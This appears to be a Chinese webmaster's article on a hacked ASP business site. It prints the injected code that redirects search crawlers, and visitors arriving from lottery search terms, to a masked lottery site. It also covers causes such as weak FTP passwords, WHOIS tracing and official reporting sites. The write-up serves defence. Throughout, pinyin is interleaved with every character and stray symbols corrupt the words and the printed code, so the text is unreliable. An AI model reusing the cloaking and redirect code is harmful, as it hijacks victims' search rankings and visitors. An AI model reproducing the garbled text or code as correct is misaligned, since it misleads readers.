寫本篇文(wén)章(zhāng)的(de)目的(de)在于揭露一(yī)種黑(hēi)客作(zu©ò)弊的(de)手段，也(yě)給那(nà)些(xiē)疏于企業(yè)網站(zhàn)安全的(de)站(zhàn)長(cháng)提一(yī)個(gè)醒。同$時(shí)提供一(yī)種追找黑(hēi)客行(xíng)蹤的(de)簡單方法。

前幾日(rì)，我的(de)客戶電(diàn)話(huà)說(shuō)自(zì)己的(de)百度排名沒有(yǒu)了(™le)，查詢下(xià)竟然百度标簽顯示的(de)內(nèi)容是(shì)一(yī)家(jiā)彩票(piào)平台的(de•)網站(zhàn)內(nèi)容。 我知(zhī)道(dào)網站(zhàn)被黑(hēi)客加入了(le)非法代碼，惡意篡改<了(le)百度快(kuài)照(zhào)。(截圖如(rú)下(xià))

查看(kàn)“百度快(kuài)照(zhào)”出現(xiàn)的(de)是(shì)一(yī)組跳(tiào)轉網站(zhàn)的(de)廣告內(nèi)容。我們對(duì♦)客戶設置的(de)網站(zhàn)信息消失了(le)。

1、黑(hēi)客是(shì)如(rú)何修改百度快(kuài)照(zhào)的(de)呢(ne)?

我進行(xíng)了(le)排查，客戶的(de)網站(zhàn)是(shì)使用(yòng)asp源碼開(kāi)發的(de)。發現(xià≈n)有(yǒu)個(gè)文(wén)件(jiàn)被黑(hēi)客寫入了(le)一(yī)段代碼。

路(lù)徑：Inc文(wén)件(jiàn)夾—SysProduct.asp文(wén)件(jiàn)裡(lǐ)面最底下(x∞ià)添加了(le)如(rú)下(xià)代碼：

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"（跳(tiào)轉的(de)網站(zhàn)，引導百度抓取的(de)≈內(nèi)容）

else

'

Response.Write"<script type=""text/javascript"">var₹ d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E♦5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5↑%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%B®D%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http:/$/*********';（目标網站(zhàn)）window.adworkergo='ad_app6'}else{}</scrσipt>"

end if

%>

黑(hēi)客設置的(de)這(zhè)串代碼導緻百度爬蟲抓取網頁的(de)時(shí)候，直接抓取越過客戶網站(zhàn)抓取↑了(le)跳(tiào)轉網站(zhàn)內(nèi)容，導緻百度快(kuài)照(zhào)裡(lǐ)面♣顯示的(de)是(shì)别的(de)內(nèi)容。使得(de)客戶本來(lái)排名首頁的(de)網站(zhàn)直接被百度屏蔽了(le)。造成了(le)客戶很(hěn)大(₹dà)的(de)損失。

2、那(nà)麽黑(hēi)客是(shì)如(rú)何進入後台的(de)呢(ne)?

黑(hēi)客要(yào)進入後台，必須知(zhī)道(dào)FTP賬戶和(hé)密碼，以及IP地(dì)€址。

造成的(de)原因有(yǒu)如(rú)下(xià)幾種：

1)一(yī)方面是(shì)FTP密碼設置的(de)時(shí)候比較簡單化(huà)，很(hěn)容易被利用(yòng)軟件(jiàn)破解掉，

2)另一(yī)方面選擇便宜的(de)空(kōng)間(jiān)也(yě)是(shì)一(yī)種隐患。因為(wèi)空(kōng)間(jiān)IP以及用(™yòng)戶名是(shì)很(hěn)難被知(zhī)道(dào)的(de)，除非有(yǒu)人(rén)提供。

3、網站(zhàn)被黑(hēi)之後，你(nǐ)如(rú)何追查黑(hēi)客的(de)來(lái)源?

方法比較簡單，就(jiù)是(shì)查詢你(nǐ)跳(tiào)轉的(de)目标網站(zhàn)的(de)域名信息。一(yī)般情況下(xià)•，都(dōu)是(shì)一(yī)些(xiē)小(xiǎo)型的(de)站(zhàn)長(cháng)開(kāi)發的(de)賺錢(qián)網站(zhàn)，通(λtōng)過查詢域名信息你(nǐ)可(kě)以獲知(zhī)該域名的(de)歸屬人(rén)是(shì)誰，他(tā)有(yǒu)可(kě)能(néng)就(jiù)是¶(shì)黑(hēi)你(nǐ)網站(zhàn)的(de)人(rén)。

如(rú)果是(shì)比較大(dà)型的(de)網站(zhàn)利用(yòng)外(wài)包的(de)方式進行(xíng)推廣，那(nà)麽你(nǐ)也​(yě)可(kě)以得(de)知(zhī)負責人(rén)，給百度或者是(shì)網絡警察舉報(bào)一(yī)下(xià)，該網站(zhàn)存在惡意攻擊修改內(nèi)容的(de)行(x‌íng)為(wèi)，畢竟它也(yě)有(yǒu)一(yī)定得(de)責任。

通(tōng)過中國(guó)萬網Whois域名查詢：比如(rú)我客戶跳(tiào)轉的(de)彩票(piào)網站(zhàn)的(de)域名信息如(rú)下(xià)：

1)第一(yī)個(gè)是(shì)：注冊人(rén)

2)第二個(gè)是(shì)：聯系電(diàn)話(huà)

3)第三個(gè)是(shì)：聯系郵箱

基本上(shàng)你(nǐ)聯系注冊人(rén)就(jiù)可(kě)以解決問(wèn)題。如(rú)果對(duì)你(nǐ)客戶造成的(de)損失太大(dà)的(de)話(huà)，建議(yì​)你(nǐ)通(tōng)過以下(xià)方式進行(xíng)維權：

違法和(hé)不(bù)良信息舉報(bào)中心：http://net.china.cn/

12321網絡不(bù)良與垃圾信息舉報(bào)受理(lǐ)中心：http://www.12321.cn/

國(guó)家(jiā)互聯網應急中心網絡安全舉報(bào)中心：http://www.cert.org.cn/¥

中國(guó)反釣魚網站(zhàn)聯盟認定及處理(lǐ)流程： http://www.cnnic.cn/

公安部信息網絡安全報(bào)警網站(zhàn)：http://www.cyberpolice.cn/wfjb/

中國(guó)掃黃(huáng)打非網：http://www.shdf.gov.cn/

北(běi)京市(shì)公安局網絡違法犯罪舉報(bào)網站(zhàn)：http://www.bj.cyberpolice.cn/index.jsp

希望本篇文(wén)章(zhāng)對(duì)你(nǐ)防黑(hēi)有(yǒu)幫助。

注：相(xiàng)關網站(zhàn)建設技(jì)巧閱讀(dú)請(qǐng)移步到(dào)建站(zhàn)教程頻(pín)道(dào)。